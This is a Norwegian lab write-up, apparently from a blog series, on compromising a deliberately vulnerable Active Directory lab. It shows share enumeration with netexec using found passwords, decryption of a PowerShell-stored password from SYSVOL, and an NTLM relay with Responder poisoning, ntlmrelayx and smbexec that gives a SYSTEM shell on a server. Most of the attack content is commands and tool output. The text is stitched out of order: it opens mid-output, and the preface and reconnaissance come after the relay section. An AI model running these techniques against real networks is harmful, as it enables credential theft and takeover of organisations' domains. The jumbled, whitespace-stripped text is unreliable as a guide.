READRemoteIPCSMB10.3.2.22445CASTELBLACKpublicREAD,WRITEBasicReadshareforalldomainusersSMB10.3.2.23445BRAAVOS [*] Enumerated sharesSMB10.3.2.23445BRAAVOSSharePermissionsRemarkSMB10.3.2.23445BRAAVOS----------------------SMB10.3.2.23445BRAAVOSADMIN$ RemoteAdminSMB10.3.2.23445BRAAVOSallREAD,WRITEBasicRWshareforallSMB10.3.2.23445BRAAVOSC$ DefaultshareSMB10.3.2.23445BRAAVOSCertEnrollActiveDirectoryCertificateServicesshareSMB10.3.2.23445BRAAVOSIPC$ READRemoteIPCSMB10.3.2.23445BRAAVOSpublicBasicReadshareforalldomainusersRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi ser at vi igjen får tilgang til castelblack og winterfell med north\arya.stark og passordet “Needle”, men her får vi også tilgang til Braavos serveren i essos.local som essos\arya.stark, istedenfor som gjest denne gangen.
Fra rekognoseringen i forrige bloggpost kunne vi også lese i beskrivelsen til Samwell Tarly at passordet skulle være Heartsbane. Vi prøver det også:
$netexecsmb--shares10.3.2.10-30-u"samwell.tarly"-p"Heartsbane"SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.12445MEEREEN [-] essos.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE SMB10.3.2.23445BRAAVOS [+] essos.local\samwell.tarly:Heartsbane (Guest)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane SMB10.3.2.23445BRAAVOS [*] Enumerated sharesSMB10.3.2.23445BRAAVOSSharePermissionsRemarkSMB10.3.2.23445BRAAVOS----------------------SMB10.3.2.23445BRAAVOSADMIN$ RemoteAdminSMB10.3.2.23445BRAAVOSallREAD,WRITEBasicRWshareforallSMB10.3.2.23445BRAAVOSC$ DefaultshareSMB10.3.2.23445BRAAVOSCertEnrollActiveDirectoryCertificateServicesshareSMB10.3.2.23445BRAAVOSIPC$ READRemoteIPCSMB10.3.2.23445BRAAVOSpublicBasicReadshareforalldomainusersSMB10.3.2.11445WINTERFELL [*] Enumerated sharesSMB10.3.2.11445WINTERFELLSharePermissionsRemarkSMB10.3.2.11445WINTERFELL----------------------SMB10.3.2.11445WINTERFELLADMIN$ RemoteAdminSMB10.3.2.11445WINTERFELLC$ DefaultshareSMB10.3.2.11445WINTERFELLIPC$ READRemoteIPCSMB10.3.2.11445WINTERFELLNETLOGONREADLogonservershareSMB10.3.2.11445WINTERFELLSYSVOLREADLogonservershareSMB10.3.2.22445CASTELBLACK [*] Enumerated sharesSMB10.3.2.22445CASTELBLACKSharePermissionsRemarkSMB10.3.2.22445CASTELBLACK----------------------SMB10.3.2.22445CASTELBLACKADMIN$ RemoteAdminSMB10.3.2.22445CASTELBLACKallREAD,WRITEBasicRWshareforallSMB10.3.2.22445CASTELBLACKC$ DefaultshareSMB10.3.2.22445CASTELBLACKIPC$ READRemoteIPCSMB10.3.2.22445CASTELBLACKpublicREAD,WRITEBasicReadshareforalldomainusersRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Prøver vi samme metoden med robb.stark og sexywolfy får vi et svært lovende resultat:
$netexecsmb--shares10.3.2.10-30-u"robb.stark"-p"sexywolfy"SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE SMB10.3.2.12445MEEREEN [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE SMB10.3.2.23445BRAAVOS [+] essos.local\robb.stark:sexywolfy (Guest)SMB10.3.2.22445CASTELBLACK [+] north.sevenkingdoms.local\robb.stark:sexywolfy SMB10.3.2.23445BRAAVOS [*] Enumerated sharesSMB10.3.2.23445BRAAVOSSharePermissionsRemarkSMB10.3.2.23445BRAAVOS----------------------SMB10.3.2.23445BRAAVOSADMIN$ RemoteAdminSMB10.3.2.23445BRAAVOSallREAD,WRITEBasicRWshareforallSMB10.3.2.23445BRAAVOSC$ DefaultshareSMB10.3.2.23445BRAAVOSCertEnrollActiveDirectoryCertificateServicesshareSMB10.3.2.23445BRAAVOSIPC$ READRemoteIPCSMB10.3.2.23445BRAAVOSpublicBasicReadshareforalldomainusersSMB10.3.2.22445CASTELBLACK [*] Enumerated sharesSMB10.3.2.22445CASTELBLACKSharePermissionsRemarkSMB10.3.2.22445CASTELBLACK----------------------SMB10.3.2.22445CASTELBLACKADMIN$ RemoteAdminSMB10.3.2.22445CASTELBLACKallREAD,WRITEBasicRWshareforallSMB10.3.2.22445CASTELBLACKC$ DefaultshareSMB10.3.2.22445CASTELBLACKIPC$ READRemoteIPCSMB10.3.2.22445CASTELBLACKpublicREAD,WRITEBasicReadshareforalldomainusersSMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)SMB10.3.2.11445WINTERFELL [*] Enumerated sharesSMB10.3.2.11445WINTERFELLSharePermissionsRemarkSMB10.3.2.11445WINTERFELL----------------------SMB10.3.2.11445WINTERFELLADMIN$ READ,WRITERemoteAdminSMB10.3.2.11445WINTERFELLC$ READ,WRITEDefaultshareSMB10.3.2.11445WINTERFELLIPC$ READRemoteIPCSMB10.3.2.11445WINTERFELLNETLOGONREAD,WRITELogonservershareSMB10.3.2.11445WINTERFELLSYSVOLREAD,WRITELogonservershareRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi har altså full admintilgang på Winterfell DCen allerede nå, men vi skal se på et par ting til før vi gir oss med initial access temaet.
Det første jeg vil demonstrere er hvordan vi kan lete etter informasjon i bl.a. gruppepolicy.
Tar vi utgangspunkt i tilgangen vi får med bare hodor:hodor kan vi f.eks se at vi har leserettigheter på SYSVOL og NETLOGON filområdene på domenekontrolleren.
Her har vi altså et powershell script, som definerer noen variabler. Den tar inn et passord, konverterer det med nøkkeldata, og lagrer et kryptert passord.
Vi kan prøve å reversere prosessen ved å ta det krypterte passordet, og dekryptere det med nøkkeldataene som ligger i scriptet.
Vi har altså en ukjent bruker, signert “T.L”, med passord powerkingftw135
NTLM Relay
Fordi vi ikke klarte å knekke passordet til Eddard Stark, så skal vi prøve å logge inn uten å kunne passordet. Dette angrepet kalles et NTLM Relay angrep.
Først har vi behov for en liste med verter som ikke krever SMB-signering, slik at vi kan forfalske opphavet til en autentiseringsforespørsel.
$netexecsmb10.3.2.10-30--gen-relay-listntlmrelay.netexecSMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)Runningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi sjekker innholdet i filen ntlmrelay.netexec, og ser at 10.3.2.22 og 10.3.2.23 er sårbare.
$catntlmrelay.netexec10.3.2.2210.3.2.23
Vi ønsker å bruke Responder sammen med NTLMRelayX for å utføre dette angrepet, så vi setter opp NTLMRelayX slik at det lagrer sesjoner i en SOCKS proxy for oss.
$ntlmrelayx.py-socks-smb2support-tf./ntlmrelay.netexec[*] Protocol Client IMAP loaded..[*] Protocol Client IMAPS loaded..[*] Protocol Client LDAP loaded..[*] Protocol Client LDAPS loaded..[*] Protocol Client SMTP loaded..[*] Protocol Client HTTPS loaded..[*] Protocol Client HTTP loaded..[*] Protocol Client MSSQL loaded..[*] Protocol Client SMB loaded..[*] Protocol Client DCSYNC loaded..[*] Protocol Client RPC loaded..[*] Running in relay mode to hosts in targetfile[*] SOCKS proxy started. Listening on 127.0.0.1:1080[*] IMAP Socks Plugin loaded..[*] LDAPS Socks Plugin loaded..[*] SMTP Socks Plugin loaded..[*] LDAP Socks Plugin loaded..[*] HTTPS Socks Plugin loaded..[*] MSSQL Socks Plugin loaded..[*] HTTP Socks Plugin loaded..[*] IMAPS Socks Plugin loaded..[*] SMB Socks Plugin loaded..[*] Setting up SMB Server on port 445[*] Setting up HTTP Server on port 80*ServingFlaskapp'impacket.examples.ntlmrelayx.servers.socksserver'*Debugmode:off[*] Setting up WCF Server on port 9389[*] Setting up RAW Server on port 6666[*] Multirelay enabled[*] Servers started, waiting for connections
NTLMRelayX er oppe, og klar til å relaye mot de sårbare vertene, og til å lagre sesjonene i en SOCKS proxy vi kan benytte oss av. For å benytte dem må vi sette opp proxychains til å bruke den.
$sudonano/etc/proxychains4.confsocks4127.0.0.11080#Legges til på slutten av fila.
Vi må også slå av SMB poisoning i responder, ettersom vi ønsker å videresende forespørselen.
$sudonano/etc/responder/Responder.conf# Påse at følgende innstillinger er satt:;PoisonerstostartMDNS=OnLLMNR=OnNBTNS=On;ServerstostartSMB=Off
Da kan vi forsøke å forgifte LLMNR, NetBios og mDNS forespørsler på nettverket, i håp om å lure Eddard Stark til å la oss videresende hans NTLMv2 hash til Castelblack og til Braavos serverene på nettverket.
Det går litt tid og så får vi se følgende, omtrent samtidig i responder og i ntlmrelayx:
# Responder[*][NBT-NS] Poisoned answer sent to 10.3.2.11 for name MEREN (service:FileServer)[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][NBT-NS] Poisoned answer sent to 10.3.2.11 for name BRAVOS (service:FileServer)[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Meren.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Meren[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][MDNS] Poisoned answer sent to 10.3.2.11 for name Bravos.local[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos[*][LLMNR] Poisoned answer sent to 10.3.2.11 for name Bravos
# NTLMRelayX[][*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.22[*] Authenticating against smb://10.3.2.22 as NORTH/EDDARD.STARK SUCCEED[*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy[][*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, attacking target smb://10.3.2.23[*] Authenticating against smb://10.3.2.23 as NORTH/EDDARD.STARK SUCCEED[*] SOCKS: Adding NORTH/[email protected](445) to active SOCKS connection. Enjoy[*] All targets processed![*] SMBD-Thread-32 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-33 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-34 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-35 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/eddard.stark at WINTERFELL, connection will be relayed after re-authentication[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-36 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-37 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-38 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication[*] All targets processed![*] SMBD-Thread-39 (process_request_thread): Connection from NORTH/[email protected] controlled, but there are no more targets left![*] Received connection from NORTH/robb.stark at WINTERFELL, connection will be relayed after re-authentication
Vi har altså snappet opp sesjoner for Eddard og Robb stark, og klart å etablere en sesjon på vegne av Eddard Stark mot begge serverene, og vi ser han er administrator på 10.3.2.22 som er Castelblack serveren.
Vi kjører smbexec.py via den etablerte sesjonen over proxychains, og ser at vi har fått tilgang som NT Authority\SYSTEM på castelblack serveren.
$proxychains4-qsmbexec.pyNORTH/[email protected]Password:# bare tomt passord her, bare trykk enter.[!] Launching semi-interactive shell - Careful what you executeC:\Windows\system32>whoamintauthority\systemC:\Windows\system32>hostnamecastelblack
Vi har altså et shell på maskinen som SYSTEM og kan egentlig gjøre hva vi har lyst til å gjøre på den maskinen, for eksempel å legge til en administratorkonto vi selv kontrollerer, skru av defender og installere skadevare, eller mange andre ting.
I neste post skal vi ta for oss hvordan vi kan innhente oss rundt i miljøet, og tilegne oss høyere og høyere tilgang.
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
Miljøet ble satt opp på IP range 10.3.2.0/24, og jeg vet at de fikk IPer i range .10–.23 dermed vet jeg at jeg kan fokusere på kartlegging i den addresseserien.
Fordi dette er en lab jeg kontrollerer selv, og den er skapt for å være sårbar, så bryr jeg meg ikke om å være usynlig.
NMAP
Noe av det aller første man ønsker å gjøre er å finne ut hva som er tilstede på nettverket, og hvilke tjenester som kjøres på disse boksene. I den sammenheng bruker jeg NMAP.
$nmap-sC-sV10.3.2.10-30StartingNmap7.95 ( https://nmap.org ) at 2025-08-25 12:21 EDT
Vi ser 5 verter på nettverket:
10.3.2.10, 10.3.2.11, 10.3.2.12 (DCer)
10.3.2.22, 10.3.2.23 (Andre servere)
Vi ser en del saftig informasjon på f.eks verten 10.3.2.22:
Vi kan se at bl.a. portene 135/tcp (RPC Mapper), 445/tcp (SMB), 3389/tcp (Remote Desktop), og 5985/tcp (WinRM) er åpne på verten 10.3.2.22
Legg også merke til SSL-Cert subject: castelblack.north.sevenkingdoms.local, dette kan være relevant informasjon, da det gir oss øyeblikkelige hint om domenestruktur og vertsnavn.
Enum4linux
Vi tester verktøyet enum4linux for å se om vi kan finne noe mer spennende på noen av serverene. Winterfell.north.sevenkingdoms.local gir oss mye informasjon.
Legg særlig merke til domeneinformasjon, brukerliste og passordpolicy.
Domeneinformasjon:
==================================( GettingdomainSIDfor10.3.2.11 )==================================DomainName:NORTHDomainSid:S-1-5-21-88918170-2512471535-2376777965[+] Host is part of a domain (notaworkgroup)
Brukerliste:
=========================================( Userson10.3.2.11 )=========================================index:0x18acRID:0x456acb:0x00000210Account:arya.starkName: (null) Desc: Arya Stark index:0x18bcRID:0x45bacb:0x00010210Account:brandon.starkName: (null) Desc: Brandon Starkindex:0x16f5RID:0x1f5acb:0x00000215Account:GuestName: (null) Desc: Built-in account for guest access to the computer/domainindex:0x18c0RID:0x45dacb:0x00000210Account:hodorName: (null) Desc: Brainless Giantindex:0x18c6RID:0x460acb:0x00000210Account:jeor.mormontName: (null) Desc: Jeor Mormontindex:0x18c3RID:0x45eacb:0x00040210Account:jon.snowName: (null) Desc: Jon Snowindex:0x18bfRID:0x45cacb:0x00000210Account:rickon.starkName: (null) Desc: Rickon Starkindex:0x18c4RID:0x45facb:0x00000210Account:samwell.tarlyName: (null) Desc: Samwell Tarly (Password:Heartsbane)index:0x18bbRID:0x45aacb:0x00000210Account:sansa.starkName: (null) Desc: Sansa Starkindex:0x18c9RID:0x461acb:0x00000210Account:sql_svcName: (null) Desc: sql service
Passordpolicy:
=============================( PasswordPolicyInformationfor10.3.2.11 )=============================[+] Attaching to 10.3.2.11 using a NULL share[+] Trying protocol 139/SMB...[!]Protocolfailed:Cannotrequestsession (Called Name:10.3.2.11)[+] Trying protocol 445/SMB...[+] Found domain(s):[+]NORTH[+]Builtin[+] Password Info for Domain: NORTH[+]Minimumpasswordlength:5[+]Passwordhistorylength:24[+]Maximumpasswordage:311days2minutes[+]PasswordComplexityFlags:000000[+]DomainRefusePasswordChange:0[+]DomainPasswordStoreCleartext:0[+]DomainPasswordLockoutAdmins:0[+]DomainPasswordNoClearChange:0[+]DomainPasswordNoAnonChange:0[+]DomainPasswordComplex:0[+]Minimumpasswordage:1day4minutes[+]ResetAccountLockoutCounter:5minutes[+]LockedAccountDuration:5minutes[+]AccountLockoutThreshold:5[+]ForcedLogoffTime:NotSet[+] Retieved partial password policy with rpcclient: PasswordComplexity:DisabledMinimumPasswordLength:5
Med disse opplysningene har vi en liste med brukere i NORTH\ og opplysninger om at det er mulig å ha passord som er helt nede i 5 tegn lengde, og at de ikke har noen kompleksitetskrav. Vi har også fått beskjed om at passordet til Samwell Tarly er ‘Heartsbane’.
Netexec
Jeg ser om jeg kan finne noen tilgjengelige fileshares på området med netexec, som har i økende grad begynt å erstatte crackmapexec.
Her benytter jeg spesifikt smb modulen i netexec, og spesifiserer brukernavn “Guest” og et blankt passord for å se om gjestetilgang er tillatt. Dette gjør jeg for å vise at vi kan hente informasjon selv før vi har funnet brukernavn/passord i denne laben.
$netexecsmb--shares10.3.2.10-30-u""-p""SMB10.3.2.11445WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL)(domain:north.sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.10445KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING)(domain:sevenkingdoms.local)(signing:True)(SMBv1:False)SMB10.3.2.22445CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK)(domain:north.sevenkingdoms.local)(signing:False)(SMBv1:False)SMB10.3.2.23445BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS)(domain:essos.local)(signing:False)(SMBv1:True)SMB10.3.2.12445MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN)(domain:essos.local)(signing:True)(SMBv1:True)SMB10.3.2.11445WINTERFELL [+] north.sevenkingdoms.local\:SMB10.3.2.11445WINTERFELL [-] Error enumerating shares: STATUS_ACCESS_DENIEDSMB10.3.2.10445KINGSLANDING [+] sevenkingdoms.local\:SMB10.3.2.10445KINGSLANDING [-] Error enumerating shares: STATUS_ACCESS_DENIEDSMB10.3.2.22445CASTELBLACK [-] north.sevenkingdoms.local\: STATUS_ACCESS_DENIED SMB10.3.2.22445CASTELBLACK [-] Error enumerating shares: Error occurs whilereadingfromremote(104)SMB10.3.2.23445BRAAVOS [-] essos.local\: STATUS_ACCESS_DENIED SMB10.3.2.23445BRAAVOS [-] Error enumerating shares: Error occurs whilereadingfromremote(104)SMB10.3.2.12445MEEREEN [+] essos.local\:SMB10.3.2.12445MEEREEN [-] Error enumerating shares: STATUS_ACCESS_DENIEDRunningnxcagainst21targets━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━100%0:00:00
Vi har lokalisert /all filesharen på både CASTELBLACK og BRAAVOS serverene. Kanskje vi kan finne noe spennende der? Vi ser også at Braavos og Castelblack ikke krever SMB Signing, og at både Braavos og Meereen støtter SMBv1.
/etc/hosts
Vi oppdaterer /etc/hosts med informasjon samlet fra enum4linux og netexec:
Vi oppdaget et dokument som heter arya.txt – dette kan være interessant, så vi laster det ned og ser på innholdet.
$catarya.txtSubject:QuickDepartureHeyArya,Ihopethismessagefindsyouwell.Somethingurgenthascomeup,andIhavetoleaveforawhile.Don't worry; I'llbebacksoon.Ileftalittlesurpriseforyouinyourroom–theswordYou've named "Needle." It felt fitting, given your skills. Take care of it, and it'lltakecareofyou.I'll explain everything when I return. Until then, stay sharp, sis.Best,John
Som vi ser er det et potensielt passordhint i dokumentet. “Needle”. Dette kan være nyttig i fremtiden.
